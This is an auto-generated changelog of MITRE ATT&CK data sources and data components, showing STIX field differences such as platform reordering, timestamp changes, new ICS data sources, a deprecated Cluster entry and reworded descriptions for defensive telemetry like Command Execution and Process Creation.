created2021-10-20T15:05:19.272925Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272925Z2022-05-11T14:00:00.188Z

[DS0037] Certificate

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275410Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275410Z2021-10-20T15:05:19.275Z

[DS0025] Cloud Service

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]IaaSAzure AD
x_mitre_platforms[1]SaaSGoogle Workspace
x_mitre_platforms[2]Office 365IaaS
x_mitre_platforms[3]Azure ADOffice 365
x_mitre_platforms[4]Google WorkspaceSaaS
created2021-10-20T15:05:19.273990Z2021-10-20T15:05:19.273Z
modified2021-11-10T09:30:48.694425Z2022-03-30T14:26:51.804Z

[DS0010] Cloud Storage

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272382Z2021-10-20T15:05:19.272Z
modified2021-11-10T09:30:48.694594Z2021-11-10T09:30:48.694Z

[DS0032] Container

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274834Z2021-10-20T15:05:19.274Z
modified2021-11-10T09:30:48.694982Z2021-11-10T09:30:48.694Z

[DS0038] Domain Name

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275460Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275460Z2021-10-20T15:05:19.275Z

[DS0016] Drive

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
created2021-10-20T15:05:19.272982Z2021-10-20T15:05:19.272Z
modified2021-11-10T09:30:48.695272Z2022-03-30T14:26:51.804Z

[DS0027] Driver

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[1]macOSWindows
x_mitre_platforms[2]WindowsmacOS
created2021-10-20T15:05:19.274252Z2021-10-20T15:05:19.274Z
modified2021-11-10T09:30:48.695431Z2022-03-30T14:26:51.805Z

[DS0022] File

Current version: 1.0


Old Description
New Description
t1A computer resource object, managed by the I/O system, for st1A computer resource object, managed by the I/O system, for s
>toring data (such as images, text, videos, computer programs>toring data (such as images, text, videos, computer programs
>, or any wide variety of other media)(Citation: Microsoft Fi>, or any wide variety of other media).(Citation: Microsoft F
>le Mgmt)>ile Mgmt)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxNetwork
x_mitre_platforms[2]macOSWindows
x_mitre_platforms[3]NetworkmacOS
created2021-10-20T15:05:19.273672Z2021-10-20T15:05:19.273Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0022https://attack.mitre.org/data-sources/DS0022
descriptionA computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)(Citation: Microsoft File Mgmt)A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)
modified2021-11-10T09:30:48.695560Z2022-04-21T14:50:59.123Z

[DS0018] Firewall

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]IaaSAzure AD
x_mitre_platforms[1]SaaSGoogle Workspace
x_mitre_platforms[2]Office 365IaaS
x_mitre_platforms[3]Azure ADLinux
x_mitre_platforms[4]LinuxOffice 365
x_mitre_platforms[5]macOSSaaS
x_mitre_platforms[7]Google WorkspacemacOS
created2021-10-20T15:05:19.273181Z2021-10-20T15:05:19.273Z
modified2021-11-10T09:30:48.695762Z2022-03-30T14:26:51.805Z

[DS0001] Firmware

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
created2021-10-20T15:05:19.265145Z2021-10-20T15:05:19.265Z
modified2021-11-10T09:30:48.695921Z2022-03-30T14:26:51.805Z

[DS0036] Group

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsAzure AD
x_mitre_platforms[1]IaaSGoogle Workspace
x_mitre_platforms[2]SaaSIaaS
x_mitre_platforms[4]Azure ADSaaS
x_mitre_platforms[5]Google WorkspaceWindows
x_mitre_collection_layers[0]HostCloud Control Plane
x_mitre_collection_layers[1]Cloud Control PlaneHost
created2021-10-20T15:05:19.275275Z2021-10-20T15:05:19.275Z
modified2021-11-10T09:30:48.695999Z2022-03-30T14:26:51.805Z

[DS0007] Image

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271956Z2021-10-20T15:05:19.271Z
modified2021-11-10T09:30:48.696179Z2021-11-10T09:30:48.696Z

[DS0030] Instance

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274538Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274538Z2021-10-20T15:05:19.274Z

[DS0035] Internet Scan

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275202Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275202Z2021-10-20T15:05:19.275Z

[DS0008] Kernel

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272087Z2021-10-20T15:05:19.272Z
modified2021-11-10T09:30:48.696693Z2021-11-10T09:30:48.696Z

[DS0011] Module

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
created2021-10-20T15:05:19.272552Z2021-10-20T15:05:19.272Z
modified2021-11-10T09:30:48.697073Z2022-03-30T14:26:51.806Z

[DS0023] Named Pipe

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
created2021-10-20T15:05:19.273816Z2021-10-20T15:05:19.273Z
modified2021-11-10T09:30:48.697149Z2022-03-30T14:26:51.806Z

[DS0033] Network Share

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
created2021-10-20T15:05:19.274950Z2021-10-20T15:05:19.274Z
modified2021-11-10T09:30:48.697227Z2022-03-30T14:26:51.806Z

[DS0021] Persona

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273623Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273623Z2021-10-20T15:05:19.273Z

[DS0014] Pod

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272712Z2021-10-20T15:05:19.272Z
modified2021-11-10T09:30:48.697559Z2021-11-10T09:30:48.697Z

[DS0003] Scheduled Job

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsContainers
x_mitre_platforms[2]macOSWindows
x_mitre_platforms[3]ContainersmacOS
x_mitre_collection_layers[0]HostContainer
x_mitre_collection_layers[1]ContainerHost
created2021-10-20T15:05:19.271574Z2021-10-20T15:05:19.271Z
modified2021-11-10T09:30:48.697992Z2022-03-30T14:26:51.806Z

[DS0019] Service

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsLinux
x_mitre_platforms[1]LinuxWindows
created2021-10-20T15:05:19.273300Z2021-10-20T15:05:19.273Z
modified2021-11-10T09:30:48.698295Z2022-03-30T14:26:51.807Z

[DS0020] Snapshot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273471Z2021-10-20T15:05:19.273Z
modified2021-11-10T09:30:48.698426Z2021-11-10T09:30:48.698Z

[DS0034] Volume

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[1]WindowsLinux
x_mitre_platforms[2]LinuxWindows
created2021-10-20T15:05:19.275065Z2021-10-20T15:05:19.275Z
modified2021-11-10T09:30:48.698797Z2022-03-30T14:26:51.807Z

[DS0005] WMI

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.271772Z2021-10-20T15:05:19.271Z
modified2021-11-10T09:30:48.699233Z2021-11-10T09:30:48.699Z

[DS0006] Web Credential

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
x_mitre_platforms[0]WindowsAzure AD
x_mitre_platforms[1]LinuxGoogle Workspace
x_mitre_platforms[2]macOSLinux
x_mitre_platforms[3]SaaSOffice 365
x_mitre_platforms[4]Office 365SaaS
x_mitre_platforms[5]Azure ADWindows
x_mitre_platforms[6]Google WorkspacemacOS
x_mitre_collection_layers[0]HostCloud Control Plane
x_mitre_collection_layers[1]Cloud Control PlaneHost
created2021-10-20T15:05:19.271876Z2021-10-20T15:05:19.271Z
modified2021-10-20T15:05:19.271876Z2022-03-30T14:26:51.807Z

[DS0024] Windows Registry

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors[]
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.273872Z2021-10-20T15:05:19.273Z
modified2021-10-20T15:05:19.273872Z2022-05-11T14:00:00.188Z
Deprecations

[DS0031] Cluster

Current version: 1.0

Description: A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedTrue
x_mitre_domains['enterprise-attack']
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-11-10T09:30:48.694817Z2022-10-20T20:54:47.329Z
created2021-10-20T15:05:19.274720Z2021-10-20T15:05:19.274Z
external_references[0]['url']https://attack.mitre.org/datasources/DS0031https://attack.mitre.org/data-sources/DS0031

ics-attack

New Data Sources

[DS0015] Application Log

Current version: 1.0

Description: Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)


[DS0039] Asset

Current version: 1.0

Description: Data sources with information about the set of devices found within the network, along with their current software and configurations


[DS0017] Command

Current version: 1.1

Description: A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)


[DS0016] Drive

Current version: 1.0

Description: A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)


[DS0022] File

Current version: 1.0

Description: A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)


[DS0001] Firmware

Current version: 1.0

Description: Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI


[DS0028] Logon Session

Current version: 1.1

Description: Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)


[DS0011] Module

Current version: 1.0

Description: Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)


[DS0033] Network Share

Current version: 1.0

Description: A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)


[DS0029] Network Traffic

Current version: 1.1

Description: Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)


[DS0040] Operational Databases

Current version: 1.0

Description: Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred


[DS0009] Process

Current version: 1.1

Description: Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)


[DS0003] Scheduled Job

Current version: 1.0

Description: Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)


[DS0012] Script

Current version: 1.1

Description: A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)


[DS0019] Service

Current version: 1.0

Description: A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)


[DS0002] User Account

Current version: 1.1

Description: A profile representing a user, device, service, or application used to authenticate and access resources


[DS0024] Windows Registry

Current version: 1.0

Description: A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)

Data Components

enterprise-attack

Minor Version Changes

Command: Command Execution

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Invoking a computer program directive to perform a specific t1The execution of a line of text, potentially with arguments,
>task (ex: Windows EID 4688 of cmd.exe showing command-line p> created from program code (e.g. a cmdlet executed via power
>arameters, ~/.bash_history, or ~/.zsh_history)>shell.exe, interactive commands like >dir, shell executions,
 > etc. )
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.273156Z2022-10-07T16:14:39.124Z
descriptionInvoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )
x_mitre_version1.01.1
created2021-10-20T15:05:19.273156Z2021-10-20T15:05:19.273Z

Sensor Health: Host Status

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.272689Z2022-10-20T20:22:45.613Z
x_mitre_version1.01.1
created2021-10-20T15:05:19.272689Z2021-10-20T15:05:19.272Z

Logon Session: Logon Session Creation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Initial construction of a new user logon session (ex: Windowt1Initial construction of a successful new user logon followin
>s EID 4624, /var/log/utmp, or /var/log/wmtp)>g an authentication attempt. (e.g. Windows EID 4624, /var/lo
 >g/utmp, or /var/log/wmtp)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.274403Z2022-10-07T16:18:20.802Z
descriptionInitial construction of a new user logon session (ex: Windows EID 4624, /var/log/utmp, or /var/log/wmtp)Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)
x_mitre_version1.01.1
created2021-10-20T15:05:19.274403Z2021-10-20T15:05:19.274Z

Malware Repository: Malware Content

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.271748Z2022-10-20T20:19:58.845Z
x_mitre_version1.01.1
created2021-10-20T15:05:19.271748Z2021-10-20T15:05:19.271Z

Malware Repository: Malware Metadata

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.271726Z2022-10-20T20:20:12.165Z
x_mitre_version1.01.1
created2021-10-20T15:05:19.271726Z2021-10-20T15:05:19.271Z

Network Traffic: Network Connection Creation

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.274515Z2022-10-20T20:18:06.745Z
x_mitre_version1.01.1
created2021-10-20T15:05:19.274515Z2021-10-20T15:05:19.274Z

Process: Process Creation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Birth of a new running process (ex: Sysmon EID 1 or Windows t1The initial construction of an executable managed by the OS,
>EID 4688)> that may involve one or more tasks or threads. (e.g. Win EI
 >D 4688, Sysmon EID 1, cmd.exe > net use, etc.)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.272195Z2022-10-07T16:15:56.932Z
descriptionBirth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)
x_mitre_version1.01.1
created2021-10-20T15:05:19.272195Z2021-10-20T15:05:19.272Z

Script: Script Execution

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Launching a list of commands through a script file (ex: Windt1The execution of a text file that contains code via the inte
>ows EID 4104)>rpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.272641Z2022-10-07T16:16:55.269Z
descriptionLaunching a list of commands through a script file (ex: Windows EID 4104)The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)
x_mitre_version1.01.1
created2021-10-20T15:05:19.272641Z2021-10-20T15:05:19.272Z

User Account: User Account Authentication

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1An attempt by a user to gain access to a network or computint1An attempt by a user to gain access to a network or computin
>g resource, often by providing credentials (ex: Windows EID >g resource, often by providing credentials (ex: Windows EID 
>4625 or /var/log/auth.log)>4776 or /var/log/auth.log)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-20T15:05:19.271547Z2022-10-07T16:19:46.282Z
descriptionAn attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4625 or /var/log/auth.log)An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)
x_mitre_version1.01.1
created2021-10-20T15:05:19.271547Z2021-10-20T15:05:19.271Z
Metadata-only Changes

Domain Name: Active DNS

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
revokedFalse
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275511Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275511Z2022-05-02T23:19:55.148Z

Active Directory: Active Directory Credential Request

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274206Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274206Z2021-10-20T15:05:19.274Z

Active Directory: Active Directory Object Access

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274227Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274227Z2021-10-20T15:05:19.274Z

Active Directory: Active Directory Object Creation

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274137Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274137Z2021-10-20T15:05:19.274Z

Active Directory: Active Directory Object Deletion

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274159Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274159Z2021-10-20T15:05:19.274Z

Active Directory: Active Directory Object Modification

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274183Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274183Z2021-10-20T15:05:19.274Z

Application Log: Application Log Content

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.272957Z2021-10-20T15:05:19.272Z
modified2021-10-20T15:05:19.272957Z2021-10-20T15:05:19.272Z

Certificate: Certificate Registration

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.275437Z2021-10-20T15:05:19.275Z
modified2021-10-20T15:05:19.275437Z2021-10-20T15:05:19.275Z

Cloud Service: Cloud Service Disable

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
created2021-10-20T15:05:19.274044Z2021-10-20T15:05:19.274Z
modified2021-10-20T15:05:19.274044Z2021-10-20T15:05:19.274Z

